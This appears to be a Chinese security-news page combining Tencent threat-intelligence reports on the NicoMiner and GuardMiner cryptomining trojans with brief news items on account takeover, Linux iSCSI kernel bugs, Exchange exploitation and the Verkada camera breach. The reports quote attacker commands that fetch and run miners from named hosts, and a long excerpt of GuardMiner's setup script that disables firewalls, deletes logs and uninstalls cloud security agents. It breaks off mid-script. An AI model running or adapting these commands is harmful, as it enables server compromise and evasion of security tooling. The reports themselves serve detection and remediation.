摘要 NicoMiner利用三个漏洞入侵传播： Hadoop Yarn未授权访问漏洞 PostgreSQL未授权漏洞 PostgreSQL提权代码执行漏洞（CVE-2019-9193）； 利用漏洞入侵成功后会针对Windows、Linux系统分别投放门罗币矿机； 感染量增长较快，一个月内翻倍，受害服务器约3000台； 针对Windows、Linux两个平台的挖矿木马使用相同的钱包； 关联分析发现疑似作者ID：Nico Jiang； 通过腾讯安图查询历史情报，发现作者疑似从事刷量相关的黑产记录。   一、概述 腾讯安全威胁情报中心捕获一起快速增长的挖矿木马NicoMiner，该木马通过Hadoop Yarn未授权访问漏洞、PostgreSQL未授权及提权代码执行漏洞（CVE-2019-9193）进行入侵攻击，会根据操作系统不同分别植入Windows和Linux平台的门罗币挖矿木马。 由于攻击者使用的域名和样本PDB信息中包含“nico jiang”的ID信息，腾讯安全威胁情报中心将该挖矿木马命名为NicoMiner。根据该挖矿木马使用的钱包算力推算，该木马在近一个月内感染量已翻倍，估计受害服务器已达3000台左右。 进一步溯源分析还发现，“nico jiang”在较早时候已从事黑灰产业，该ID陆续注册了与游戏推广、刷量黑灰产有关的域名，近期启用之前留置的相关网络资源从事挖矿黑产。也不排除近期可能有其他黑客掌控 “nico jiang”曾经注册的相关域名和开发设备，用来制作、传播NicoMiner挖矿木马。 腾讯安全全系列产品已支持对NicoMiner挖矿木马攻击传播的各个环节进行检测防御： 排查和加固 由于NicoMiner挖矿木马的攻击呈现明显增长趋势，腾讯安全专家建议企业客户参考以下步骤对系统进行排查和加固： 1.删除进程和文件： 文件： /*/pgsql-*/data/java.* /*/pgsql/data/java.* /*/postgres/*/data/LinuxTF /tmp/java Windows系统 c:\postgresql\*\data\conhost.exe c:\postgresql\*\data\sqltools.exe c:\windows\temp\st.exe c:\program files\postgresql\data\pg*\sqltools.exe 检查CPU占用高的进程： java LinuxTF conhost.exe sqltools.exe 2.加固系统： Hadoop 1)如果Hadoop环境仅对内网提供服务，请不要将其服务开放到外网可访问。 2)如果必须开启公网访问，Hadoop在2.X以上版本提供了安全认证功能，建议管理员升级并启用Kerberos的认证功能，阻止未经授权的访问。 PostgreSQL 1)修改PostgreSQL的访问配置/data/pgsql/9.3/data/pg_hba.conf，限制不受信任的对象进行访问； 2)谨慎考虑分配pg_read_server_files、pg_write_server_files、pg_execute_server_program 角色权限给数据库客户。 二、样本分析 漏洞入侵 1）Hadoop Yarn未授权访问漏洞 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。客户可以向YARN提交特定应用程序进行执行，其中就允许执行相关包含系统命令。 YARN提供有默认开放在8088和8090的REST API（默认前者）允许客户直接通过API进行相关的应用创建、任务提交执行等操作，如果配置不当，REST API将会开放在公网导致未授权访问的问题，攻击者可以在未授权的情况下远程执行代码。 攻击者通过扫描暴露在公网的的8088端口，发现没有开启特定客户安全认证的集群，并通过YARN RESET API提交应用，提交任务的客户名为dr.who。 攻击者在创建的Hadoop应用中通过Post hxxp://ip:8088/ws/v1/cluster/apps执行恶意命令为： wget hxxp://raw.nicosoft.org/java && chmod x java && ./java || curl -O hxxp://raw.nicosoft.org/java && chmod x java && ./java 该命令从黑客控制的服务器上下载挖矿木马java并启动。 2）PostgreSQL未授权访问漏洞 PostgreSQL未授权访问漏洞主要是由于管理员配置不当形成的。PostgreSQL配置文件在/data/pgsql/9.3/data/pg_hba.conf，如果管理员没有正确的配置信任的主机，（如下图），则会导致任意客户无需密码均可访问PostgreSQL数据库。 3）PostgreSQL提权代码执行漏洞（CVE-2019-9193） 2019年3月安全研究人员披露了PostgreSQL提权代码执行漏洞（CVE-2019-9193）的漏洞细节，具有数据库服务端文件读权限的攻击者利用此漏洞，可执行任意系统命令。 此次披露的漏洞存在于导入导出数据的命令“COPY TO/FROM PROGRAM””中，“pg_read_server_files”组内客户执行上述命令后，可获取数据库超级客户权限，从而执行任意系统命令。该漏洞几乎影响了PostgreSQL的所有版本（从9.3到最新版本），同时也影响了所有的操作系统：Windows，Linux和Mac。 受影响PostgreSQL版本：PostgreSQL >=9.3 攻击者通过批量扫描5432端口发现PostgreSQL服务器，然后利用未授权访问漏洞获得了PostgreSQL数据库的访问权限，接着再利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）根据不同的系统执行以下恶意命令： 针对Linux系统： sh -c curl -O hxxp://raw.nicosoft.org/java && chmod +x java && ./java 针对Windows系统： certutil -urlcache -split -f hxxp://raw.nicosoft.org/conhost.exe conhost.exe&start conhost.exe 挖矿 入侵Linux系统下载的挖矿木马java： 入侵Windows系统后下载的dowanload木马conhost.exe，负责继续下载和启动挖矿木马SqlTools.exe 挖矿木马SqlTools.exe   挖矿使用矿池：xmr.f2pool.com 两种系统下的挖矿木马使用同一个钱包： 42Pv7VF4etz1dDPkjRWDEec2FVoFzSPDYKCsjNXDdusaTShBZZn6nr8GyNsqu8ekjSU17jmu7h6SfLg1Lr3rrJnHVokCbso 钱包收益：7个XMR 过去一个月钱包算力翻番，从150kH/s左右涨到了300kH/s，这也意味着感染的机器翻了一倍，估算在3000台左右。   三、关联分析 分析样本发现，dowanload木马conhost.exe中保留了文件的PDB信息，其中“Nico Jiang”疑似木马作者的ID号。 C:\Users\Nico Jiang\source\repos\NicoSoft\x64\Release\conhost.pdb 通过腾讯安图高级威胁溯源系统查询木马下载使用的域名“raw.nicosoft.org”，同样发现了注册者的名字为“Nico Jiang”，推测该ID号是攻击者的可能性较高。 通过搜索引擎搜索，发现域名注册的QQ邮箱对应QQ号所有者，在某个论坛接一些批量登录工具的开发需求。 该ID注册的另一个域名ns-game.top 通过该域名注册使用的outlook邮箱,查询到在github提交的项目，属于相关平台的辅助管理插件： 结论 从对ID “nico jiang”搜索到的信息来看，可以判断该ID对应的人员是一位软件开发人员，曾经从事一些网站、游戏或知名应用的批量登陆工具，刷量工具的开发，具有一定的灰产属性，而相关记录大都在2016年。 可疑的地方是，注册人显示为”nico jiang”的域名raw.nicosoft.org、ns-game.top的注册时间分别在2017年和2018年，而PDB信息包含”nico jiang”的木马样本conhost.exe编译日期是2021年3月21日（更早的样本也只再2021年2月开始出现），两者相隔较远。 推测可能有两种结论，第一种是”nico jiang”在从事灰产的时候注册了相关域名，并在发现了挖矿具有很大的获利空间之后，转向了制作挖矿木马的黑产，并且使用了之前注册的相关域名来提供下载服务。 第二种是有其他黑产获得了”nico jiang”的域名，以及”nico jiang”所使用过的电脑（PDB路径中的客户名通常是开发机器的客户名）的控制权，并且利用这些资源来开发和传播挖矿木马。根据已有的线索来看，属于第一种情况的可能性较大，腾讯安全威胁情报中心会将相关线索提交给有关部门，以对不法分子进行身份确认和追踪。   三、威胁视角看攻击行为 ATT&CK阶段 行为 侦察 扫描IP端口，确认可攻击目标存在的Web服务：Hadoop Yarn, PostgreSQL等。 资源开发 注册C2服务器，制作downlaoder木马，挖矿木马 初始访问 利用对外开放的Hadoop Yarn, PostgreSQL服务漏洞，植入恶意Payload执行恶意命令进而入侵系统 执行 首先植入恶意脚本执行恶意命令，随后下载挖矿木马 防御规避 木马文件加壳保护，将文件命名伪装为系统文件 影响 门罗币矿机不间断的工作，会导致系统CPU负载过大，大量消耗主机CPU资源，严重影响主机正常服务运行，导致主机有系统崩溃风险。 订阅腾讯安全威胁情报产品，赋能全网安全设备 该团伙相关的威胁数据已加入腾讯安全威胁情报，可赋能给腾讯全系列安全产品，推荐政企客户通过订阅腾讯安全威胁情报产品，让全网安全设备同步具备相应的威胁检测、防御能力。 公有云的安全防护 推荐政企客户在公有云中部署腾讯云防火墙、腾讯主机安全（云镜）等产品检测防御相关威胁。 腾讯云防火墙（云镜）已支持拦截利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）发起的恶意攻击行为。 腾讯主机安全可对病毒攻击过程中产生得木马落地文件进行自动检测，客户可后台一键隔离，删除。 私有云的安全防护 私有云客户可通过腾讯T-Sec高级威胁检测系统进行流量检测分析，及时发现黑客团伙的攻击活动。腾讯T-Sec高级威胁检测系统（御界）可检测到利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）发起的恶意攻击行为。 NicoMiner挖矿木马会危害Linux、Windows双平台系统，推荐企业私有云客户在每台终端、服务器部署腾讯T-Sec零信任无边界访问控制系统（iOA），腾讯iOA集成病毒防护和漏洞修复能力可防御病毒木马对终端和服务器的破坏活动。腾讯iOA通过验证客户身份、设备及应用安全状态确定是否允许客户访问企业业务，确保对企业公有云、私有云以及本地业务的可信访问。无论员工位于何处、使用何设备，都可安全访问企业资源和数据。 腾讯安全响应清单 腾讯安全系列产品针对NicoMiner挖矿木马攻击的具体响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）威胁情报已加入，可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考: https://cloud.tencent.com/product/tics 腾讯T-Sec 网络空间风险云监测系统 （CCMS） 1）NicoMiner相关情报已加入。 腾讯安全云监测系统，面向行业客户的监管方和被监管方，结合漏洞扫描、涉敏内容检测、全网威胁情报发现能力等，为客户提供全面、及时的互联网风险监测评估服务，并可提供配套安全管家服务，可对相关风险提供有效的响应处理。 腾讯T-Sec 高级威胁追溯系统 1）NicoMiner相关情报已支持检索，可自动关联分析到该病毒家族最新变种，使用资产。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。腾讯T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud  Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，阻断恶意攻击流量，阻断恶意通信流量： 1）NicoMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持NicoMiner关联模块的检测告警，查杀清理。 2）已支持检测主机存在的以下相关漏洞： Hadoop未授权访问漏洞、Postgres未授权访问漏洞 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 （SOC） 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）NicoMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 （iOA） 1）已支持NicoMiner关联模块的检测告警，查杀清理。 零信任无边界访问控制系统（iOA）是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念，推出的网络边界访问管控整体解决方案。更多资料，可参考：https://s.tencent.com/product/ioa/index.html   IOCs Domain raw.nicosoft.org IP 154.91.1.27（ZoomEye搜索结果） Md5 Java df840b3decb91ae7480b2ccf95df9f9a Java dba1ef891aed1c769014a0d3aa5ed321 Java 1aa6a96f4a6fcc5c4309f2406d3479ba CONHOST.EXE 32b8a44ee3214ab56e1edbaa016918c7 CONHOST.EXE 0a31ae5882697455a071f73191ed661c CONHOST.EXE 2c31a7243f00afe467e2994d3c249024 conhost.exe bf825890526386dd96e82d2ce57e0303 SqlTools.exe 84757d6b1a94021f246d14b37c1015b8 task.exe 52cd60289ffe8e14c5aa6cb8ea8ad730 LinuxTF f453b9c09ea2fb6a194b5d81d515b0e8 URL hxxp://raw.nicosoft.org/SqlTools.exe hxxp://nicosoft.org/SqlTools.exe hxxp://154.91.1.27/SqlTools.exe hxxp://nicosoft.org/sqltools.exe hxxp://154.91.1.27/sqltools.exe hxxp://raw.nicosoft.org/java hxxp://raw.nicosoft.org/conhost.exe hxxp://154.91.1.27/task.exe hxxp://154.91.1.27/conhost.exe hxxp://154.91.1.27/WinRing0x64.sys hxxp://154.91.1.27/LinuxTF   参考链接： https://s.tencent.com/research/report/1206.html https://s.tencent.com/research/report/1175.html https://cloud.tencent.com/developer/article/1472565  

网络检测和响应公司Vectra AI的最新研究显示，由于COVID-19，88%的公司已经加快了云和数字化转型项目。但它还发现，71%的Office 365用户遭遇恶意账户接管。 令人担忧的是，只有三分之一的安全专业人员认为他们可以立即识别和阻止账户接管攻击，大多数人预计需要几天甚至几周的时间来拦截这种违规行为。Vectra公司CTO团队技术总监Tim Wade说：”我们经常看到基于身份的攻击被用来绕过传统外围防御，如多因素认证（MFA）。帐户接管正在取代网络钓鱼成为最常见的攻击载体，而MFA防御系统现在已经变成减速带，而无法阻止攻击。组织需要认真对待这一点，并计划在业务发生实质性中断之前检测和控制账户泄露。恶意访问，即使是短时间的，也会造成巨大的损失。” 安全团队对自己公司安全措施有效性有很高的信心。近五分之四的人声称对绕过防火墙等外围防御的攻击有良好或非常好的可视性。然而，管理层受访者和SOC分析师等从业人员之间的意见存在有趣的对比，管理人员对自己的防御能力表现出更大的信心。总的来说，微软Office365客户提到的最主要的安全问题是云端保存的数据被泄露的风险、账户被接管的风险以及黑客隐藏行踪的能力。 经理们明显比那些在工作场所进行具体工作的人更有信心，这里有一定程度的自欺欺人，也许是因为与高级管理层分享的指标往往更多关注的是被阻止的攻击量，而不是攻击的严重性或达成确定结论的调查数量。不管是什么原因，重要的是不要自满，要对新类型的攻击保持持续的警惕。           （消息及封面来源：cnBeta）

通常情况下，基于 Linux 的发行版本要比 Windows 更加安全，但这并不是说就没有漏洞了。近日，网络安全公司 GRIMM 的安全研究人员在 Linux 内核中发现了不少于 3 个漏洞，可以利用这些漏洞可以获得系统的 root 权限。更重要的是，这些漏洞已经存在长达 15 年之久。 这些漏洞（被追踪为 CVE-2021-27363、CVE-2021-27364 和 CVE-2021-27365）存在于内核的 iSCSI 模块中。虽然在默认情况下该模块是没有被加载的，但是 Linux 内核对模块按需加载的支持意味着它可以很容易地被调用到行动中。安全专家在 Red Hat 所有已测试版本和其他发行版本中均存在这些漏洞。 在 GRIMM 博客上，安全研究员 Adam Nichols 表示：“我们在 Linux mainline 内核的一个被遗忘的角落里发现了 3 个BUG，这些 BUG 已经有 15 年的历史了。与我们发现的大多数积满灰尘的东西不同，这些 BUG 依然存在影响，其中一个原来可以作为本地权限升级（LPE）在多个 Linux 环境中使用”。 这些漏洞存在于无法远程访问的代码中，所以无法被黑客远程利用。但这并不意味着它的破坏力不强。Nichols 警告说黑客可以利用这些漏洞发起任何现有的网络威胁，甚至于会让事情变得更加糟糕。可以想象在你的系统中有不信任的用户以 root 权限访问，这是多么的可怕。 在详细介绍这三个漏洞的博文中，Nichols 解释了受影响的系统类型：”为了让这些漏洞暴露在用户区，scsi_transport_iscsi 内核模块必须被加载。当执行创建 NETLINK_ISCSI 套接字的调用时，这个模块会被自动加载。此外，至少有一个 iSCSI 传输必须在 iSCSI 子系统中注册。在某些配置中，当无权限的用户创建 NETLINK_RDMA 套接字时，ib_iser 传输模块将被自动加载。” 正如 SC Media 所解释的那样，这些漏洞已经在以下内核版本中得到修复：5.11.4、5.10.21、5.4.103、4.19.179、4.14.224、4.9.260 和 4.4.260。而其他已经停止支持的内核将不会收到本次安全修复。             （消息及封面来源：cnBeta）

由于更多的黑客组织涌入，试图在受影响的公司为其服务器打补丁之前趁虚而入，微软Exchange服务器被黑客攻击正成为一个更大的安全问题。微软3月3日披露，黑客组织 “Hafnium”的攻击目标是微软Exchange服务器的漏洞，促使微软发布补丁。 漏洞公布后不久，Hafnium加强了攻击力度，在几天内袭击了3万家美国机构和世界各地的其他机构，但现在其他机构也加入了战团。安全专家告诉《金融时报》，更多的黑客组织正在利用这个机会，利用同样的漏洞进行自己的攻击。包括犯罪集团在内的黑客们，都是在托管服务器的组织打上补丁和保护之前，利用软件漏洞介入的。 对许多人来说，现在先发制人地修补这个问题可能为时已晚。”每一个可能的受害者，如果在上周中到年底还没有打补丁，就已经被至少一个或几个行为者命中了，”安全组织CrowdStrike联合创始人Dmitri Alperovitch这样表示。 在美国之外，欧洲银行业管理局成为第一个确认受到攻击的主要公共机构。 膨胀的攻击规模将在一段时间内成为一个严重的问题，促使政府进行干预。网络安全和基础设施安全局（CISA）已经敦促 “所有部门的所有组织遵循指导，以解决国内和国际上广泛存在的漏洞”。 还有人建议使用微软的IOC检测工具来确定是否发生了脆弱系统的入侵。同时白宫国家安全委员会声称：”任何拥有脆弱服务器的组织都必须立即采取措施，确定是否已经成为目标。”           （消息来源：cnBeta；封面源自网络）

北京时间3月10日消息，一群黑客表示，他们已经入侵了硅谷监控创业公司Verkada收集的海量监控摄像头数据，能够看到医院、公司、警局、监狱以及学校内部的15万个监控摄像头的实时录像情况。 监控视频被曝光的企业包括特斯拉、软件提供商Cloudflare。此外，黑客还能够看到女子卫生诊所、精神病院以及Verkada本身办公室内部的视频。其中一个视频拍摄自特斯拉上海仓库内部，能够看到装配线上的工人。黑客称，他们能够访问特斯拉工厂和仓库内的222个摄像头。 Verkada代表在一份声明中称：“我们已经禁用了所有内部管理员账户来防止任何未经授权的访问。我们的内部安全团队和外部安全团队正在调查这一潜在问题的规模和范围。”特斯拉、Cloudflare等尚未置评。           （消息来源：cnBeta；封面源自网络）

一、概述 腾讯安全威胁情报中心检测到GuardMiner挖矿木马团伙新的攻击活动，该团伙利用Elasticsearch远程代码执行漏洞（CVE-2015-1427）等9种漏洞武器针对云上主机发起攻击。根据检测数据推算，受害主机已过万台，该挖矿木马会卸载云主机安装的安全软件。腾讯安全专家建议企业安全运维人员积极修复服务器组件漏洞，避免使用弱口令，防止云主机被该团伙使用的漏洞武器攻陷。 GuardMiner最早出现于2019年，至今已活跃超过2年，该挖矿木马通过Go语言编写的二进制程序针对Windows平台和Linux平台进行攻击传播，通过crontab定时任务以及安装SSH公钥后门进行持久化控制，并且还会利用比特币的交易记录来动态更新C2地址。 分析发现，GuardMiner挖矿团伙最新的攻击活动利用了多达9种攻击传播手法： 1)    CCTV设备RCE漏洞； 2)    Redis未授权访问漏洞； 3)    Drupal框架CVE-2018-7600漏洞； 4)    Hadoop未授权访问漏洞； 5)    Spring RCE漏洞CVE-2018-1273； 6)    Thinkphp V5高危漏洞； 7)    WebLogic RCE漏洞CVE-2017-10271； 8)    SQL Server弱口令爆破； 9)    Elasticsearch RCE漏洞 CVE-2015-1427、CVE-2014-3120 GuardMiner挖矿团伙入侵云主机后的挖矿行为会对服务器性能产生严重负面影响，服务器的正常业务有中断或崩溃风险。挖矿团伙在失陷服务器留置后门，关闭linux防火墙、卸载云服务器安全软件等行为，会导致服务器安全性受损，增加被其他黑客组织攻击的风险。 排查和加固 由于GuardMiner掌握较强的自动化攻击和扩散感染能力，腾讯安全专家建议企业及时检查以下位置并进行清理，同时对服务器使用的相关组件进行版本检查和漏洞修复，对于Redis、SQL Server使用的弱密码尽快予以纠正。 文件和进程 /etc/phpguard /etc/phpupdate /etc/networkmanager Crontab任务： */30 * * * * sh /etc/newdat.sh */2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh SSH公钥（/root/.ssh/authorized_keys）： AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17 腾讯安全响应清单 腾讯安全全系列产品支持对GuardMiner挖矿木马攻击传播的各个环节进行检测拦截。 腾讯安全产品针对GuardMiner团伙漏洞攻击武器，可在各个环节进行检测防御，具体响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）威胁情报已加入，可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 网络空间风险云监测系统 （CCMS） 1）GuardMiner相关情报已加入。 腾讯安全云监测系统，面向行业用户的监管方和被监管方，结合漏洞扫描、涉敏内容检测、全网威胁情报发现能力等，为用户提供全面、及时的互联网风险监测评估服务，并可提供配套安全管家服务，可对相关风险提供有效的响应处理。 腾讯T-Sec 高级威胁追溯系统 1）GuardMiner相关情报已支持检索，可自动关联分析到该病毒家族最新变种，使用资产。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud  Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，阻断恶意攻击流量，阻断恶意通信流量： 1）GuardMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞 Drupal CVE-2018-7600漏洞 thinkphp TP5高危漏洞 WebLogic CVE-2017-10271漏洞 Elasticsearch CVE-2014-3120远程代码执行漏洞 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持GuardMiner关联模块的检测告警，查杀清理。 2）已支持检测主机存在的以下相关漏洞： Redis未授权命令执行漏洞 Hadoop未授权访问漏洞 Drupal  CVE-2018-7600漏洞 thinkphp  TP5高危漏洞 WebLogic  CVE-2017-10271漏洞 Elasticsearch  CVE-2014-3120远程代码执行漏洞 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）GuardMinerr相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Redis未授权命令执行漏洞 Hadoop未授权访问漏洞 Drupal  CVE-2018-7600漏洞 Spring  CVE-2018-1273漏洞 thinkphp  TP5高危漏洞 WebLogic  CVE-2017-10271漏洞 Elasticsearch CVE-2014-3120远程代码执行漏洞Elasticsearch  CVE-2015-1427远程代码执行漏洞 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 （iOA） 1）已支持GuardMiner关联模块的检测告警，查杀清理。 零信任无边界访问控制系统（iOA）是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念，推出的网络边界访问管控整体解决方案。更多资料，可参考：https://s.tencent.com/product/ioa/index.html 二、样本分析 利用Elasticsearch漏洞入侵 Elasticsearch是用Java语言开发的，并作为Apache许可条款下的开放源码发布，是一种流行的企业级搜索引擎。Elasticsearch用于云计算中，能够达到实时搜索，稳定，可靠，快速，安装使用方便。 搜索引擎支持使用脚本代码（Groovy）作为表达式进行数据操作，并且加入了沙盒进机制对危险的代码进行拦截，由于沙盒限制的不严格，导致产生远程代码执行漏洞CVE-2015-1427。该漏洞的攻击代码已被公开：hxxps://github.com/t0kx/exploit-CVE-2015-1427/blob/master/exploit.sh 腾讯云防火墙检测到黑客利用CVE-2015-1427漏洞攻击云主机： 利用漏洞执行的恶意命令为： wget hxxp://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo 我们对命令下载执行的脚本init.sh进行分析发现其属于挖矿僵尸网络GuardMiner。 环境准备 1. init.sh关闭selinux防火墙 setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null 2. 清理缓存 sync && echo 3 >/proc/sys/vm/drop_caches 3. 获取crontab目录和SSH公钥认证文件 crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` 4. 将下载程序curl、wget重命名为cdt、wdt bbdir="/usr/bin/curl" bbdira="/usr/bin/cdt" ccdir="/usr/bin/wget" ccdira="/usr/bin/wdt" mv /usr/bin/curl /usr/bin/url mv /usr/bin/url /usr/bin/cdt mv /usr/bin/cur /usr/bin/cdt mv /usr/bin/cdl /usr/bin/cdt mv /usr/bin/cd1 /usr/bin/cdt mv /usr/bin/wget /usr/bin/get mv /usr/bin/get /usr/bin/wdt mv /usr/bin/wge /usr/bin/wdt mv /usr/bin/wdl /usr/bin/wdt mv /usr/bin/wd1 /usr/bin/wdt 5. 设置Linux系统能打开的最大文件数量 ulimit -n 65535 6. 删除系统日志文件 rm -rf /var/log/syslog 7. 设置tmp目录无法被删除 chattr -iua /tmp/ chattr -iua /var/tmp/ 8. 关闭Linux防火墙，删除过滤规则 ufw disable iptables -F 9. 禁用看门狗程序 echo '0' >/proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 10. 卸载阿里云骑士等云主机安全软件 if ps aux | grep -i '[a]liyun'; then $bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis* systemctl stop aliyun.service systemctl disable aliyun.service service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -y elif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.sh Fi service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % rm -rf /usr/local/aegis 11. 设置系统最大内存分页 echo 128 > /proc/sys/vm/nr_hugepages sysctl -w vm.nr_hugepages=128 12. 设置挖矿木马、Shell脚本、扫描程序、守护程序的下载URL miner_url="hxxp://176.123.7.127/id210131/phpupdate" miner_url_backup="hxxp://h.epelcdn.com/dd210131/phpupdate" sh_url="hxxp://176.123.7.127/id210131/newdat.sh" sh_url_backup="hxxp://h.epelcdn.com/dd210131/newdat.sh" config_url="hxxp://176.123.7.127/id210131/config.json" config_url_backup="hxxp://h.epelcdn.com/dd210131/config.json" scan_url="hxxp://176.123.7.127/id210131/networkmanager" scan_url_backup="hxxp://h.epelcdn.com/dd210131/networkmanager" watchdog_url="hxxp://176.123.7.127/id210131/phpguard" watchdog_url_backup="hxxp://h.epelcdn.com/dd210131/phpguard" 13. 从比特币的交易记录中动态获取C2地址 （使用的比特币钱包为：1Hf2CKoVDyPj7dNn3vgTeFMgDqVvbVNZQq） if [ -x "$(command -v curl)" ]; then aa="1Hf2CKoVDyPj7dNn3vgTeFMgDqVvbVNZQq" bb="https://api.blockcypher.com/v1/btc/main/addrs/$aa?limit=2" cc=`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,3,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==2'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,1,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==2'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,3,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==1'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,1,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==1'` fi 挖矿 1. init.sh首先通过端口、进程名、文件名、钱包、矿池匹配，清除竞品挖矿木马 2. 然后杀死tmp目录下的或者CPU占用超过40%的可疑程序。 3. 清理被用来挖矿的docker容器 docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "monero" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "slowhttp" | awk '{print 